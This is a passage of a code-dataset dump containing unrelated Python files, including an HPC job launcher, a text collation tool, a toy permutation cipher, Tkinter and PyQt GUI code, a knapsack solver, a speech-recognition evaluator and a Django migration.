os.uname()\n g = socket.getfqdn()\n host = ' '.join([h[0], h[4], h[1], g])\n f = os.path.dirname(__file__)\n f = os.path.join(f, 'conf', 'hostmap.yaml')\n d = yaml.load(open(f))\n for m, h in d:\n if h in host:\n return host, m\n return host, 'Default'\n\n\ndef configure(args=None, defaults=None, **kwargs):\n import os, sys, pwd, json, yaml, multiprocessing\n\n # defaults\n if args == None:\n args = {}\n args.update(kwargs)\n path = os.path.dirname(__file__)\n path = os.path.join(path, 'conf') + os.sep\n f = path + 'default.yaml'\n job = yaml.load(open(f))\n job = storage(**job)\n job['argv'] = sys.argv[1:]\n job['host'], job['machine'] = hostname()\n job['maxcores'] = multiprocessing.cpu_count()\n if defaults != None:\n job.update(defaults)\n\n # email\n try:\n import configobj\n f = os.path.expanduser('~')\n f = os.path.join(f, '.gitconfig')\n job['email'] = configobj.ConfigObj(f)['user']['email']\n except:\n job['email'] = pwd.getpwuid(os.geteuid())[0]\n\n # merge arguments, 1st pass\n for k in args:\n job[k] = args[k]\n\n # merge machine parameters\n if job['machine'] and job['machine'].lower() != 'default':\n f = path + job['machine'] + '.yaml'\n m = yaml.load(open(f))\n job.update(m)\n #for h, o in job['host_opts'].items():\n # if h in job['host']:\n # for k, v in o.items():\n # job[k] = v\n\n # arguments, 2nd pass\n for k in args:\n job[k] = args[k]\n\n # command line parameters\n for i in job['argv']:\n if not i.startswith('--'):\n raise Exception('Bad argument ' + i)\n k, v = i[2:].split('=')\n if len(v) and not v[0].isalpha():\n v = json.loads(v)\n job[k] = v\n\n return job\n\n\ndef prepare(job=None, **kwargs):\n \"\"\"\n Compute and display resource usage\n \"\"\"\n import os, time\n\n # prepare job\n if job is None:\n job = configure(**kwargs)\n else:\n for k in kwargs:\n job[k] = kwargs[k]\n\n # misc\n job.update({\n 'jobid': '',\n 'date': time.strftime('%Y-%m-%d'),\n })\n\n # mode options\n k = job['mode']\n d = job['mode_opts']\n if k in d:\n job.update(d[k])\n\n # dependency\n if job['depend']:\n job['depend_flag'] = job['depend_flag'].format(depend=job['depend'])\n else:\n job['depend_flag'] = ''\n\n # notification\n if job['nproc'] > job['notify_threshold']:\n job['notify_flag'] = job['notify_flag'].format(email=job['email'])\n else:\n job['notify_flag'] = ''\n\n # queue options\n opts = job['queue_opts']\n if opts == []:\n opts = [(job['queue'], {})]\n elif job['queue']:\n opts = [d for d in opts if d[0] == job['queue']]\n if len(opts) == 0:\n raise Exception('Error: unknown queue: %s' % job['queue'])\n\n # loop over queue configurations\n for q, d in opts:\n job['queue'] = q\n job.update(d)\n\n # additional job parameters\n job.update({\n 'nodes': 1,\n 'cores': job['nproc'],\n 'ppn': job['nproc'],\n 'totalcores': job['nproc'],\n 'ram': 0,\n 'walltime': '',\n 'submission': '',\n })\n\n # processes\n r = job['ppn_range']\n if not r:\n r = range(1, job['maxcores'] + 1)\n job['nodes'] = min(job['maxnodes'], (job['nproc'] - 1) // r[-1] + 1)\n job['ppn'] = (job['nproc'] - 1) // job['nodes'] + 1\n for i in r:\n if i >= job['ppn']:\n break\n job['ppn'] = i\n job['totalcores'] = job['nodes'] * job['maxcores']\n\n # memory\n if not job['pmem']:\n job['pmem'] = job['maxram'] // job['ppn']\n job['ram'] = job['pmem'] * job['ppn']\n\n # SU estimate and wall time limit\n # FIXME???\n m = job['maxtime']\n job['walltime'] = '%d:%02d:00' % (m // 60, m % 60)\n sus = m // 60 * job['totalcores'] + 1\n\n # if resources exceeded, try another queue\n if job['ppn_range'] and job['ppn'] > job['ppn_range'][-1]:\n continue\n if job['maxtime'] and job['minutes'] > job['maxtime']:\n continue\n break\n\n # threads\n if job['nthread'] < 0 and 'OMP_NUM_THREADS' in os.environ:\n job['nthread'] = os.environ['OMP_NUM_THREADS']\n\n # messages\n if job['verbose'] > 1:\n print('Nodes: %s' % job['nodes'])\n print('Procs per node: %s' % job['ppn'])\n print('Threads per node: %s' % job['nthread'])\n print('RAM per node: %sMb' % job['ram'])\n print('SUs: %s' % sus)\n print('Time: ' + job['walltime'])\n\n # warnings\n if job['verbose']:\n if job['ram'] and job['ram'] > job['maxram']:\n print('Warning: exceeding available RAM per node (%sMb)' % job['maxram'])\n if job['minutes'] > job['maxtime']:\n print('Warning: walltime estimate exceeds limit (%s)' % job['walltime'])\n\n # format commands\n job['execute'] = job['execute'].format(**job)\n job['submit'] = job['submit'].format(**job)\n if job['wrapper']:\n job['wrapper'] = job['wrapper'].format(**job)\n job['submission'] = job['name'] + '.sh'\n else:\n job['submission'] = job['executable']\n\n return job\n\n\ndef launch(job=None, **kwargs):\n import os, re, shlex, subprocess\n\n # prepare job\n if job is None:\n job = prepare(**kwargs)\n else:\n for k in kwargs:\n job[k] = kwargs[k]\n\n # launch\n if job['submit']:\n if job['wrapper']:\n f = job['name'] + '.sh'\n open(f, 'w').write(job['wrapper'])\n os.chmod(f, 755)\n c = shlex.split(job['submit'])\n out = subprocess.check_output(c)\n print(out)\n d = re.search(job['submit_pattern'], out).groupdict()\n job.update(d)\n else:\n c = shlex.split(job['execute'])\n subprocess.check_call(c)\n\n\n return job\n\n","sub_path":"cst/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"547109098","text":"\nfrom difference_set import DifferenceSet, DifferenceSetJSONEncoder\nfrom difference_line import DifferenceLine\nfrom collated_lines import CollatedLines\nfrom difference_line import DifferenceLineJSONEncoder\nimport json\nfrom ..text import Line, TextJSONEncoder\n\nclass Collation(object):\n\n def __init__(self, base_text, other_texts=[], tokenizer=None, tagger=None):\n \"\"\"Create a structure for capturing the differents between the various elements of a Text\n\n Args:\n base_text (Text): The Document used as a base text\n other_text (Text): The Document used as the variant text\n tokenizer (obj): The tokenizer used in the extraction of features from each line within the texts\n tagger (obj): The part-of-speech tagger used in the analysis of each token\n\n \"\"\"\n\n self.base_text = base_text\n self.other_texts = other_texts\n self.tokenizer = tokenizer\n self.tagger = None\n\n self.titles = []\n self.headnotes = []\n self.body = []\n self.footnotes = {}\n\n self.compare(self.other_texts)\n\n def compare(self, other_texts):\n\n # Iterate through each title\n for title_line_index, title_line in enumerate(self.base_text['titles']):\n\n title_line_data = json.loads(title_line)\n collated_titles = CollatedLines(title_line_data, [])\n\n # Iterate through the titles for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_title_index, other_text_title_line in enumerate(other_text['titles']):\n if other_text_title_index == title_line_index:\n other_title_line_data = json.loads(other_text_title_line)\n collated_titles.add_variant_line(other_title_line_data)\n\n self.titles.append(collated_titles.values())\n\n for headnote_line_index, headnote_line in enumerate(self.base_text['headnotes']):\n\n headnote_line_data = json.loads(headnote_line)\n collated_headnotes = CollatedLines(headnote_line_data, [])\n\n # Iterate through the headnotes for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_headnote_index, other_text_headnote_line in enumerate(other_text['headnotes']):\n if other_text_headnote_index == headnote_line_index:\n other_headnote_line_data = json.loads(other_text_headnote_line)\n collated_headnotes.add_variant_line(other_headnote_line_data)\n\n self.headnotes.append(collated_headnotes.values())\n\n # Comparing lines in the body of the text\n for body_line_index, body_line in enumerate(self.base_text['body']):\n\n body_line_data = json.loads(body_line)\n collated_body_line = CollatedLines(body_line_data, [])\n\n # Iterate through the body for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_body_index, other_text_body_line in enumerate(other_text['body']):\n if other_text_body_index == body_line_index:\n other_body_line_data = json.loads(other_text_body_line)\n collated_body_line.add_variant_line(other_body_line_data)\n\n self.body.append(collated_body_line.values())\n\n # Comparing footnotes\n for footnote_line_ref, footnote_line in self.base_text['footnotes'].iteritems():\n\n footnote_line_data = json.loads(footnote_line)\n collated_footnote_line = CollatedLines(footnote_line_data, [])\n\n # Iterate through the body for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_footnote_line_ref, other_text_footnote_line in other_text['footnotes'].iteritems():\n if other_text_footnote_line_ref == footnote_line_ref:\n other_text_footnote_line_data = json.loads(other_text_footnote_line)\n collated_footnote_line.add_variant_line(other_text_footnote_line_data)\n\n self.footnotes[footnote_line_ref] = collated_footnote_line.values()\n\n def merge(self, new_collation):\n\n self.compare(new_collation.other_texts)\n self.other_texts.extend(new_collation.other_texts)\n","sub_path":"swift_collate/collate/collation.py","file_name":"collation.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290273680","text":"import pandas as pd\ns1 = u'ÀÁÂÃÈÉÊÌÍÒÓÔÕÙÚÝàáâãèéêìíòóôõùúýĂăĐđĨĩŨũƠơƯưẠạẢảẤấẦầẨẩẪẫẬậẮắẰằẲẳẴẵẶặẸẹẺẻẼẽẾếỀềỂểỄễỆệỈỉỊịỌọỎỏỐốỒồỔổỖỗỘộỚớỜờỞởỠỡỢợỤụỦủỨứỪừỬửỮữỰựỲỳỴỵỶỷỸỹ'\ns0 = u'AAAAEEEIIOOOOUUYaaaaeeeiioooouuyAaDdIiUuOoUuAaAaAaAaAaAaAaAaAaAaAaAaEeEeEeEeEeEeEeEeIiIiOoOoOoOoOoOoOoOoOoOoOoOoUuUuUuUuUuUuUuYyYyYyYy'\n# (1)->(4)->(3)->(1)\n# (2)->(5)->(2)\nsigma = [3, 5, 4, 1, 2]\n# sigma[i] is index of character moved to i\n\n\ndef remove_accents(input_str):\n s = ''\n\n for c in input_str:\n if c in s1:\n s += s0[s1.index(c)]\n else:\n s += c\n return s\n\n\ndef remove_accents_of_plaintext(filepath: str):\n df = pd.read_csv(filepath)\n list = df['Name']\n list = [remove_accents(name) for name in list]\n df['Name'] = list\n df.pop('Unnamed: 0')\n df.to_csv(filepath, index=False)\n\n\ndef encrypt_name_by_permutation_sigma(name: str, sigma: list):\n words = name.split(\" \")\n sequence = \"\".join(words)\n n_sigma = len(sigma)\n\n if len(sequence) % n_sigma != 0:\n sequence += \" \"*(n_sigma-len(sequence) % (n_sigma))\n\n print(sequence)\n ciphertext = [sequence[i//len(sigma)*len(sigma)+sigma[i % len(sigma)]-1]\n for i in range(len(sequence))]\n ciphertext = \"\".join(ciphertext)\n\n return ciphertext.replace(\" \", \"\")\n\n\ndef analysis_data(data_path, analysis_path):\n df = pd.read_csv(data_path)\n namelist: list[str] = df[\"Name\"]\n dictionary: dict = {}\n amount_word = 0\n for name in namelist:\n words = name.split(\" \")\n amount_word += 1\n\n word = words[0]\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary.update({word: 1})\n key_list: list = list(dictionary.keys())\n key_list.sort(key=lambda x: -dictionary[x])\n newdf = pd.DataFrame({\"word\": key_list, \"portion\": [\n dictionary[key]*100/amount_word for key in key_list]})\n newdf.to_csv(analysis_path, index=False)\n\n\ndef analysis_cipher(data_path, analysis_path, n):\n df = pd.read_csv(data_path)\n namelist: list[str] = df[\"Name\"]\n dictionary: dict = {}\n amount_word = 0\n for name in namelist:\n name = name.replace(\" \", \"\")\n words = [name[i:i+n] for i in range(0, len(name), n)]\n amount_word += 1\n word = words[0]\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary.update({word: 1})\n key_list: list = list(dictionary.keys())\n key_list.sort(key=lambda x: -dictionary[x])\n newdf = pd.DataFrame({\"word\": key_list, \"portion\": [\n dictionary[key]*100/amount_word for key in key_list]})\n newdf.to_csv(analysis_path, index=False)\n\n\nanalysis_data(\"data.csv\", \"analysis.csv\")\nencrypt_file(\"plaindata.csv\", 'cipherdata.csv', sigma)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher1.csv\", 1)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher2.csv\", 2)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher3.csv\", 3)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher4.csv\", 4)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher5.csv\", 5)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher6.csv\", 6)\n","sub_path":"sigma/position_permutation.py","file_name":"position_permutation.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479281890","text":"#== == == == == == == == == == == == == == == == == == == == == == == == ==\r\n# Description\r\n# ===================================================\r\n\r\n\"\"\"\r\nFile Name : ScrollFrame.py\r\n\r\nPurpose : Create frame with scroll bar(the transaction frame)\r\n\r\n\"\"\"\r\n# ===================================================\r\n# Imports\r\n# ===================================================\r\nimport Tkinter as tk\r\n\r\n# ===================================================\r\n# Classes\r\n# ===================================================\r\n\r\n\r\nclass ScrollFrame(tk.Frame):\r\n\r\n def __init__(self, parent):\r\n \"\"\"\r\n Enter Statement: the constructor gets upper frame object\r\n Exit Statement: the constructor init and create ScrollFrame object\r\n \"\"\"\r\n tk.Frame.__init__(self, parent)\r\n\r\n #Create the vertical scrollbar\r\n vscrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\r\n vscrollbar.pack(fill=tk.Y, side=tk.RIGHT, expand=tk.FALSE)\r\n\r\n #Create the canvas of the frame\r\n canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)\r\n canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=tk.TRUE)\r\n\r\n #Set scroll bar to scroll the canvas y points\r\n vscrollbar.config(command=canvas.yview)\r\n\r\n # reset the view\r\n canvas.xview_moveto(0)\r\n canvas.yview_moveto(0)\r\n\r\n # create a frame inside the canvas which will be scrolled with it\r\n self.interior = interior = tk.Frame(canvas, background=\"black\")\r\n interior_id = canvas.create_window(0, 0, window=interior,\r\n anchor=tk.NW)\r\n\r\n def _configure_interior(event):\r\n \"\"\"\r\n Enter Statement: the function gets event object\r\n Exit Statement: the function config the frame inside the canvas\r\n Return type: None\r\n \"\"\"\r\n\r\n # update the scrollbars to match the size of the inner frame\r\n size = (interior.winfo_reqwidth(), interior.winfo_reqheight())\r\n canvas.config(scrollregion=\"0 0 %s %s\" % size)\r\n if interior.winfo_reqwidth() != canvas.winfo_width():\r\n # update the canvas's width to fit the inner frame\r\n canvas.config(width=interior.winfo_reqwidth())\r\n\r\n interior.bind('', _configure_interior)\r\n\r\n def _configure_canvas(event):\r\n \"\"\"\r\n Enter Statement: the function gets event object\r\n Exit Statement: the function config the canvas itself\r\n Retutn type: None\r\n \"\"\"\r\n if interior.winfo_reqwidth() != canvas.winfo_width():\r\n # update the inner frame's width to fill the canvas\r\n canvas.itemconfigure(interior_id, width=canvas.winfo_width())\r\n\r\n canvas.bind('', _configure_canvas)\r\n\r\n","sub_path":"Blockchain Files/ScrollFrame.py","file_name":"ScrollFrame.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185413349","text":"import json\nimport re\nimport string\nfrom pathlib import Path\nimport yaml\nimport os\n\nallow_string = string.digits + string.ascii_letters + '-_ '\n\n\ndef is_allow_string(char):\n if u'\\u4e00' <= char <= u'\\u9fff' or char in allow_string:\n return True\n return False\n\n\ndef replace_name(name):\n name = name.strip()\n name = name.replace('(', '(').replace(')', ')')\n name = re.sub(r\"[(\\[].*?[)\\]]\", \"\", name)\n name = ''.join([s for s in name if is_allow_string(s)])\n name = name.strip().replace(' ', '-').replace('--', '-').replace('--', '-')\n return name.lower()\n\n\ndef valid_fingerprint(rule):\n fields = ['name', 'path', 'status_code', 'keyword', 'headers', 'favicon_hash', 'priority']\n if all([key in rule for key in fields]):\n for key in list(rule):\n if key not in fields:\n rule.pop(key)\n return rule\n else:\n print(\"字段不完全\", rule)\n return None\n\n\ndef fingerprint_json_generator(path):\n fingerprint_all_dict = {}\n for site, site_list, file_list in os.walk(path):\n for file_name in file_list:\n print(file_name)\n abs_filename = os.path.abspath(os.path.join(site, file_name))\n with open(abs_filename) as y:\n y_dict = yaml.safe_load(y)\n name = replace_name(y_dict.get('name', ''))\n fingerprint_rules = y_dict.get('fingerprint', [])\n for rule in fingerprint_rules:\n rule['name'] = name\n valid_rule = valid_fingerprint(rule)\n if valid_rule:\n path = rule.pop('path')\n if path not in fingerprint_all_dict:\n fingerprint_all_dict.setdefault(path, [valid_rule])\n else:\n rules = fingerprint_all_dict.get(path, [])\n if valid_rule not in rules:\n rules.append(valid_rule)\n fingerprint_all_dict[path] = rules\n web_fingerprint = dict(sorted(fingerprint_all_dict.items()))\n with open(\"web_fingerprint.json\", 'w') as wfp:\n json.dump(web_fingerprint, wfp)\n return web_fingerprint\n\n\nfingerprint_json_generator(\"fingerprint\")\n","sub_path":".github/script/auto_update.py","file_name":"auto_update.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585589462","text":"# coding=utf-8\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom c.error import Error\nfrom v.ui_editar import Ui_Editar\nfrom m.empleado import Empleado\n\nclass Editar(QDialog):\n\t\n\te = None\n\terror = None\n\t\n\tdef __init__(self, principal):\n\t\tQDialog.__init__(self, principal)\n\t\tself.ui = Ui_Editar()\n\t\tself.ui.setupUi(self)\n\t\t\n\t\tself.ui.buttonBox.button(QDialogButtonBox.Ok).setText(\"Aceptar\")\n\t\tself.ui.buttonBox.button(QDialogButtonBox.Cancel).setText(\"Cancelar\")\n\t\t\n\t\tself.error = Error(self)\n\t\t\n\t\tself.ui.leCuil.textChanged.connect(lambda : self.cambioCuil())\n\t\n\tdef center(self):\n\t\tqr = self.frameGeometry()\n\t\tcp = QDesktopWidget().availableGeometry().center()\n\t\tqr.moveCenter(cp)\n\t\tself.move(qr.topLeft())\n\t\n\tdef cambioCuil(self, ):\n\t\tc = str(self.ui.leCuil.text())\n\t\t\n\t\tif len(c) < 8:\n\t\t\treturn\n\t\telif len(c) > 8 and \"-\" not in c:\n\t\t\tc = c[:2] + \"-\" + c[2:]\n\t\telif len(c) == 12 and not c.endswith('-') and c[10] != '-':\n\t\t\tc = c[:11] + \"-\" + c[11:]\n\t\telif len(c) == 13 and c[11] != '-':\n\t\t\tc = c[:12]\n\t\t\n\t\tself.ui.leCuil.setText(c)\n\t\n\tdef mostrar(self, principal):\n\t\t\n\t\tself.center()\n\t\t\n\t\templeado = str(principal.ui.lblEmpleado.text().toUtf8())\n\t\t\n\t\tdocumento = empleado.split('(')[1]\n\t\t\n\t\tdocumento = int(documento[:-1])\n\t\t\n\t\tfor e in principal.empleados:\n\t\t\tif e.documento == documento:\n\t\t\t\tself.e = e\n\t\t\t\tbreak\n\t\t\n\t\tif self.e.cuil == \"\":\n\t\t\tself.ui.leCuil.setText(str(self.e.documento))\n\t\telse:\n\t\t\tself.ui.leCuil.setText(self.e.cuil)\n\t\tself.ui.leNombre.setText(self.e.nombre.decode('utf-8'))\n\t\tself.ui.leApellido.setText(self.e.apellido.decode('utf-8'))\n\t\t\n\t\tf_nacimiento = QDate()\n\t\tdia, mes, anio = self.e.fecha_nacimiento.split('/')\n\t\tf_nacimiento.setDate(int(anio), int(mes), int(dia))\n\t\tself.ui.deFechaNacimiento.setDate(f_nacimiento)\n\t\t\n\t\tgeneros = {'F' : 0, 'M' : 1}\n\t\tself.ui.cmbGenero.setCurrentIndex(generos[self.e.genero])\n\t\tself.ui.leDomicilio.setText(self.e.domicilio.decode('utf-8'))\n\t\tself.ui.leTelefono.setText(self.e.telefono)\n\t\t\n\t\tf_ingreso = QDate()\n\t\tdia, mes, anio = self.e.fecha_ingreso.split('/')\n\t\tf_ingreso.setDate(int(anio), int(mes), int(dia))\n\t\tself.ui.deFechaIngreso.setDate(f_ingreso)\n\t\tself.ui.sbNroLegajo.setValue(self.e.nro_legajo)\n\t\t\n\t\trevistas = {'Comisión' : 0, 'Pasantía' : 1, 'Permanente' : 2, 'Temporaria' : 3, 'Transitoria' : 4}\n\t\tself.ui.cmbRevista.setCurrentIndex(revistas[self.e.sit_revista])\n\t\t\n\t\tcargos = {'Administrativo' : 0, 'Jerárquico' : 1, 'Obrero' : 2, 'Profesional' : 3, 'Servicio' : 4}\n\t\tself.ui.cmbCargo.setCurrentIndex(cargos[self.e.cargo])\n\t\t\n\t\tself.show()\n\t\n\tdef closeEvent(self, event):\n\t\tpass\n\t\n\tdef reject(self, ):\n\t\t\n\t\tself.limpiar()\n\t\t\n\t\tself.done(QDialog.Rejected)\n\t\t\n\tdef accept(self, ):\n\t\ttry:\n\t\t\tself.e.cuil = str(self.ui.leCuil.text())\n\t\t\t\n\t\t\tif '-' in self.e.cuil:\n\t\t\t\t\n\t\t\t\tp = \"\"\n\t\t\t\tdoc = \"\"\n\t\t\t\ts = \"\"\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tp, doc, s = self.e.cuil.split('-')\n\t\t\t\texcept Exception as ex:\n\t\t\t\t\traise Exception(\"El cuil no cumple con el formato necesario: \" + str(ex))\n\t\t\t\t\n\t\t\t\tself.e.documento = doc\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.e.documento = str(self.ui.leCuil.text())\n\t\t\t\n\t\t\tself.e.nombre = str(self.ui.leNombre.text().toUtf8())\n\t\t\tself.e.apellido = str(self.ui.leApellido.text().toUtf8())\n\t\t\tself.e.fecha_nacimiento = str(self.ui.deFechaNacimiento.text())\n\t\t\tself.e.genero = str(self.ui.cmbGenero.currentText())\n\t\t\tself.e.domicilio = str(self.ui.leDomicilio.text().toUtf8())\n\t\t\tself.e.telefono = str(self.ui.leTelefono.text())\n\t\t\tself.e.fecha_ingreso = str(self.ui.deFechaIngreso.text())\n\t\t\tself.e.nro_legajo = str(self.ui.sbNroLegajo.text())\n\t\t\tself.e.sit_revista = str(self.ui.cmbRevista.currentText().toUtf8())\n\t\t\tself.e.cargo = str(self.ui.cmbCargo.currentText().toUtf8())\n\t\t\t\n\t\t\t\n\t\t\tself.e.guardar()\n\t\t\t\n\t\t\tself.limpiar()\n\t\t\t\n\t\t\tself.done(QDialog.Accepted)\n\t\t\t\n\t\texcept Exception as ex:\n\t\t\tself.error.setText(\"Ha ocurrido un error mientras intentaba editar un empleado.\".decode('utf-8'))\n\t\t\tself.error.setDetailedText(str(ex).decode('utf-8'))\n\t\t\tself.error.mostrar()\n\t\n\tdef limpiar(self, ):\n\t\t\n\t\tself.ui.sbNroLegajo.setValue(0)\n\t\tself.ui.leNombre.setText(\"\")\n\t\tself.ui.leApellido.setText(\"\")\n\t\tself.ui.leCuil.setText(\"\")\n\t\tself.ui.leNivel.setText(\"\")\n\t\tself.ui.leDomicilio.setText(\"\")\n\t\tself.ui.leTelefono.setText(\"\")\n\t\tself.ui.cmbGenero.setCurrentIndex(0)\n\t\tself.ui.cmbRevista.setCurrentIndex(0)\n\t\tself.ui.cmbCargo.setCurrentIndex(0)\n\t\t\n","sub_path":"c/editar.py","file_name":"editar.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502987211","text":"# implementation by @kaba_y, https://korogba.github.io\nimport sys\n\nfrom utils.file_operations import convert_file_to_knapsack\n\n# throws a maximum resursion depth exceeded if this the limit is not raised\nsys.setrecursionlimit(3000)\nvalue_list, weight_list, capacity = convert_file_to_knapsack('../input_random_44_2000000_2000.txt')\nfound_solutions = {}\nsorted_weights = sorted(weight_list)\n\n\ndef knapsack_recursive(i, cap) -> int:\n if i == 0 or cap == 0:\n return 0\n\n if (i, cap) in found_solutions:\n return found_solutions[(i, cap)]\n\n if weight_list[i] > cap:\n found_solutions[(i, cap)] = knapsack_recursive(i - 1, cap)\n else:\n found_solutions[(i, cap)] = max(knapsack_recursive(i - 1, cap),\n knapsack_recursive(i - 1, cap - weight_list[i]) + value_list[i])\n\n return found_solutions[(i, cap)]\n\n\nprint(knapsack_recursive(len(value_list) - 1, capacity))\n","sub_path":"dynamic_programming/knapsack_recursive.py","file_name":"knapsack_recursive.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162999062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 29 20:54:55 2020\n\n@author: 九童\n语音识别模型的使用和评估\n\"\"\"\nimport scipy.io.wavfile\nfrom hlp.stt.las.data_processing import mfcc_extract\nimport tensorflow as tf\nimport numpy as np\n\ndef evaluate(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model):\n #sentence = preprocess_en_sentence(sentence)\n sample_rate, signal = scipy.io.wavfile.read(wav_path) \n wav_mfcc = mfcc_extract.MFCC(sample_rate,signal)\n\n #inputs = [inp_lang.word_index[i] for i in sentence.split(' ')] # token编码\n #inputs = tf.keras.preprocessing.sequence.pad_sequences([inputs],\n #maxlen=max_length_inp,\n #padding='post') # 填充\n #print('====wav_mfcc.shape = {}'.format(wav_mfcc.shape))#(60, 39)\n wav_mfcc = tf.expand_dims(wav_mfcc, 0)#(1,60, 39)\n wav_mfcc = tf.keras.preprocessing.sequence.pad_sequences(wav_mfcc,maxlen = max_length_inp,padding='post',dtype = float)\n wav_mfcc = tf.convert_to_tensor(wav_mfcc) # numpy数组转换成张量\n \n #print('====wav_mfcc.shape = {}'.format(wav_mfcc.shape))#(1,93, 39)\n result = '' # 语音识别结果字符串\n\n \n dec_input=tf.keras.utils.to_categorical([targ_lang_tokenizer.word_index[''] - 1],num_classes=len(targ_lang_tokenizer.word_index)+1) \n dec_input = tf.expand_dims(dec_input, 1)\n dec_input = np.array(dec_input).astype(int)\n dec_input = tf.convert_to_tensor(dec_input)\n #print('====dec_input = {}'.format(dec_input))\n for t in range(max_length_targ): # 逐步解码或预测\n predictions = model([wav_mfcc, dec_input])\n #print('====predictions.shape = {}'.format(predictions.shape))\n predicted_id = tf.argmax(predictions[0][0]).numpy() + 1 # 贪婪解码,取最大\n #print('====predicted_id = {}'.format(predicted_id))\n \n result += targ_lang_tokenizer.index_word[predicted_id] + ' ' # 目标句子\n #print('====result = {}'.format(result))\n if targ_lang_tokenizer.index_word[predicted_id] == '':\n return result\n\n # 预测的 ID 被输送回模型\n dec_input = tf.keras.utils.to_categorical([predicted_id - 1],num_classes=len(targ_lang_tokenizer.word_index)+1) \n dec_input = tf.expand_dims(dec_input, 1) \n #print('====afterdec_input.shape = {}'.format(dec_input.shape))\n\n return result\n\n\n\ndef speech_recognition(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model):\n \n result = evaluate(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model)\n print('Predicted speech_recognition: {}'.format(result))\n\n \n","sub_path":"hlp/stt/las/recognition_evaluate.py","file_name":"recognition_evaluate.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"457442674","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Document',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('docfile', models.FileField(upload_to=b'documents/%Y/%m/%d')),\n ('owner', models.ForeignKey(related_name='document', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Incentive',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('created', models.DateTimeField(auto_now_add=True)),\n ('schemeID', models.IntegerField(default=0)),\n ('schemeName', models.CharField(default=b'', max_length=100, blank=True)),\n ('typeID', models.IntegerField(default=0)),\n ('typeName', models.CharField(default=b'', max_length=100, blank=True)),\n ('status', models.BooleanField(default=True)),\n ('ordinal', models.IntegerField(default=0, null=True, blank=True)),\n ('modeID', models.IntegerField(default=0)),\n ('presentationDuration', models.DateTimeField(auto_now_add=True)),\n ('groupIncentive', models.BooleanField(default=False)),\n ('text', models.TextField()),\n ('condition', models.TextField()),\n ('owner', models.ForeignKey(related_name='incentive', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('created',),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('tagID', models.IntegerField()),\n ('tagName', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='incentive',\n name='tags',\n field=models.ManyToManyField(to='incentive.Tag', null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"src/incentive/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160008827","text":"import tkinter as tk\r\nroot = tk.Tk()\r\n\r\ndef addition():\r\n mylable = tk.Label(root, text=\"heloo\")\r\n mylable.pack()\r\n\r\nmybutton = tk.Button(root, text=\"Click Me\", command=addition)\r\nmybutton.pack()\r\n# Code to add widgets will qgo here...\r\nroot.mainloop()","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"94412236","text":"from collections import deque\nclass Node(object):\n def __init__(self, data):\n self.value = data\n self.left = None\n self.right = None\n\n def __repr__(self):\n return(dir(self.root.value))\n #return \"\" % (self.root, self.root.value)\n\nclass 